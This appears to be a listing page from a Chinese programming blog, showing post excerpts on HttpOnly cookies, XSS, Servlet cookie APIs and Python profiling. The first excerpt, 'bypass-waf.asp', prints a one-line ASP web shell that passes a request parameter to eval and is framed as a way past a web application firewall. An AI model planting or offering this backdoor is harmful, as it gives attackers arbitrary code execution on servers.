bypass-waf.asp <%dim x1,x2x1 = request("pass")x2 = x1eval x2%> <!-- yes++ --><!-- 一句话 pass... 12月08日 编程茶楼 1,139 次浏览 发表评论 阅读全文
Tomcat and HttpOnly Session Cookies Just wanted to let you know that Apache Tomcat can now be configured to use HttpOnly session cookies... 10月29日 编程茶楼 825 次浏览 发表评论 阅读全文
XSS与HTTP-only Cookie 脚本获取JSESSIONID的方法 XSS与HTTP-only Cookie介绍:XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其... 10月29日 编程茶楼 1,033 次浏览 发表评论 阅读全文
编程茶楼 如何为cookie设置HttpOnly 将cookie设置成HttpOnly是为了防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。如何在Java中设置cookie是Htt... 10月29日 884 次浏览 发表评论 阅读全文
编程茶楼 Servlet 3.0笔记之会话Cookie设置相关 在Servlet 3.0中增加对Cookie(请注意,这里所说的Cookie,仅指和Session互动的Cookie,即人们常说的会话Cookie)较为全面的操作API。最为突出特性:支持直接修改Se... 10月29日 951 次浏览 发表评论 阅读全文
Java EE 6.0 的 Cookie 类已经有设置 HttpOnly 的方法 一般的Cookie都是从document对象中获得的,现在浏览器在设置 Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏... 10月29日 编程茶楼 1,195 次浏览 发表评论 阅读全文
Python Python性能分析指南 尽管并非每个你写的Python程序都需要严格的性能分析,但了解一下Python的生态系统中很多优秀的在你需要做性能分析的时候可以使用的工具仍然是一件值得去做的事。 分析一个程序的性能,最终都归... 09月25日 1,312 次浏览 发表评论 阅读全文